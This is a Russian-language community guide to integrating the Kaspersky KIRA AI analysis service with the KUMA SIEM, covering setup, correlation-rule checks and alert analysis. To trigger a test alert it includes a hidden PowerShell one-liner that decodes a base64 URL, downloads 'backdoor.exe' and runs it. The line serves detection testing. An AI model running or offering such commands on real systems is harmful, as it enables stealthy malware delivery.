Skip to main content

Настройка интеграции с KIRA и примеры использования

Информация, приведенная на данной странице, является разработкой команды pre-sales и/или community KUMA и НЕ является официальной рекомендацией вендора.

Официальная документация по данному разделу приведена в онлайн-справке на продукт: 
https://support.kaspersky.ru/kuma/4.0/294800

Видео по работе KIRA и ключевые преимущества:
https://box.kaspersky.com/f/48a6de7a26044d9ea60c/ 

Kaspersky Investigation & Response Assistant (далее — KIRA) — это облачный сервис на базе искусственного интеллекта для анализа событий информационной безопасности.

KIRA выполняет детальный разбор командных строк и скриптов Windows и Linux с возможностью деобфускации, формирует краткое описание их назначения и предоставляет аналитическую информацию, необходимую для ускорения расследования инцидентов и приоритизации алертов.

Для использования сервиса ИИ KIRA необходимо:

  • Наличие действующей лицензии с модулем AI.
  • Наличие файла сертификата в формате PFX, запакованного в архив <имя заказчика>.ZIP, и пароля к сертификату для отправки запросов.

Для получения сертификата и пароля обратитесь к сотрудникам Лаборатории Касперского или представителям партнера.

  • Наличие у пользователя одной из ролей: Главный администратор, Администратор, Аналитик 2-го уровня, Аналитик 1-го уровня, Младший аналитик. 

Настройка интеграции KIRA доступна только пользователю с ролью Главный администратор.


Настройка интеграции с KIRA

Чтобы настроить интеграцию с KIRA:

  • Перейдите в раздел Параметры Интеграции AI-сервисы.
  • В открывшемся окне перейдите на вкладку Kaspersky Investigation & Response Assistant.
  • Включите интеграцию с KIRA, установив переключатель Статус в активное положение.
  • Нажмите Выбрать файл и загрузите архив <имя заказчика>.ZIP, в котором содержится сертификат в формате PFX.
  • В поле Пароль от сертификата укажите пароль.
  • Сервис KIRA отправляет запросы в облачный сервис, поэтому если в инфраструктуре используется прокси-сервер для доступа в Интернет выберите в раскрывающемся списке Прокси-сервер ранее созданный ресурс или создайте новый.
  • В раскрывающемся списке выберите язык ответа на запрос в KIRA: русский или английский. KUMA будет передавать и хранить ответы KIRA на выбранном языке.
  • Нажмите Сохранить. После того как вы нажмете Сохранить, вам будет предложено принять условия Лицензионного соглашения. Если вы не примете соглашение, сохранить параметры и продолжить работу с сервисом будет невозможно.

image481.png

После сохранения параметров будет показано доступное количество токенов. Количество токенов обновляется ежедневно.

Интеграция с сервисом KIRA успешно настроена. Анализ будет доступен для всех событий, как новых, так и уже полученных.


Выполнение анализа с помощью KIRA

После того как интеграция настроена, можно выполнять анализ команд или скриптов с помощью KIRA.

Для примера создадим новый алерт, но Вы также можете использовать события из уже сформированного алерта:

  • Убедитесь, что правило R110_04_Сокрытие окна выполнения PowerShell скрипта привязано к коррелятору. Для этого:
    • Перейдите в Ресурсы Активные сервисы
    • Выберите сервис Коррелятора
    • В окне Редактирование коррелятора перейдите на шаг Корреляция
    • В поле Поиск введите «110_04»
    • Убедитесь, что правило R110_04_Сокрытие окна выполнения PowerShell скрипта присутствует в списке.
    • Если правило отсутствует в списке выполните привязку правила аналогично Статьям Создание правила корреляции типа Simple или Создание правила корреляции типа Standard.

image482.png

  • Убедитесь, что события Windows A new process has been created (Event ID 4688) поступают с тестовой рабочей станции. Для этого:
    • Перейдите в раздел События.
    • Укажите следующий поисковый запрос:
SELECT * FROM `events` WHERE DeviceEventClassID = '4688' AND DeviceHostName = '<имя тестовой рабочей станции>'  ORDER BY Timestamp DESC LIMIT 250
    • Нажмите Выполнить запрос
    • Убедитесь, что события A new process has been created отображаются в таблице событий.
    • Если события A new process has been created отсутствуют в таблице событий выполните настройку сбора событий с EventID 4688 согласно Статье Настройка получения событий Windows.

image.png

  • На тестовой рабочей станции откройте консоль PowerShell и выполните следующую команду:

 

powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -W Hidden -Command "$s = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2E3Mzk2ZDYxY2FmZmUxOGE0Y2ZmYmIzYjQyOGM5YjYwLmNvbS9kL2JhY2tkb29yLmV4ZQ==')); iwr $s -OutFile backdoor.exe; Start-Process .\backdoor.exe"
  • В веб-интерфейсе KUMA перейдите в раздел Алерты и убедитесь, что алерт R110_04_Сокрытие окна выполнения PowerShell скрипта появился в таблице алертов.

image483.png

Чтобы выполнить анализ:

  • Нажмите на название алерта R110_04_Сокрытие окна выполнения PowerShell скрипта.
  • В секции Связанные события нажмите Найти в событиях.
  • В открывшемся окне Расследование алерта откройте карточку базового или корреляционного события.
  • Наведите на поле DeviceCustomString4, в котором содержится текст выполненного скрипта, и нажмите на символ image.png
  • В раскрывающемся списке выберите Проанализировать с помощью KIRA.

image485.png

Альтернативный способ отправки запросов в KIRA: на панели инструментов в карточке события в раскрывающемся списке Проанализировать с помощью KIRA выберите поле, значение которого вы хотите проанализировать.

image486.png

  • В открывшемся окне Проанализировать с KIRA отобразится команда для анализа. Обратите внимание, что base64 строка, содержащаяся в скрипте, была автоматически деобфусцирована.

image487.png

Чтобы ознакомиться с отчетом об деобфускации нажмите Действия и выберите Посмотреть отчет по деобфускации.

image488.png

  • Если вы хотите предварительно определить количество токенов, которые будут затрачены на анализ, в раскрывающемся списке Действия выберите Рассчитать размер в токенах. Количество токенов для анализа = количество токенов на отправку запроса + количество токенов на ответ.

image489.png

  • Чтобы проанализировать команду, нажмите кнопку Проанализировать. Если токенов достаточно, запустится выполнение анализа и появится задача Запрос в KIRA. Выполнение запроса может занимать от 30 секунд и дольше.

Возможность редактирования запроса перед отправкой в KIRA обеспечивает дополнительный уровень контроля над конфиденциальностью данных. Это особенно важно в случаях, когда анализируемые строки кода содержат чувствительную информацию, такую как персональные данные, учетные записи или ключи доступа.

  • Результат анализа доступен в том же окне Проанализировать с помощью KIRA: вывод, краткое содержание и развернутый анализ. 

image490.png

После выполнения анализа результат будет отображаться в карточке события на вкладке Анализ KIRA и будет доступен для просмотра всем пользователям с доступом к функциональности Проанализировать с помощью KIRA

Результаты анализа KIRA хранятся в кэше в течение 14 дней.

image491.png

Также можно просмотреть результат анализа в разделе Диспетчер задач в свойствах задачи Запрос в KIRA. При нажатии на название задачи, в контекстном меню будут доступны следующие действия:

  • Посмотреть результат - в этом случае любой пользователь с доступом к задачам KIRA может просмотреть результаты выполнения задачи из кэша и токены не будут потрачены.
  • Перезапустить - в этом случае анализ будет выполнен без учета данных предыдущего анализа, хранящихся в кеше, и токены будут потрачены на выполнение анализа.

image492.png

Помимо отправки запросов в KIRA при расследовании алертов запросы можно отправлять непосредственно из раздела События.

image493.png


Примеры команд для анализа KIRA

Команды нерабочие все ссылки заменены, но это не отменяет перепроверку и аккуратность использования!

Ссылка на примеры:
https://github.com/KUMA-Community/kuma_content/blob/main/kira/usecases.md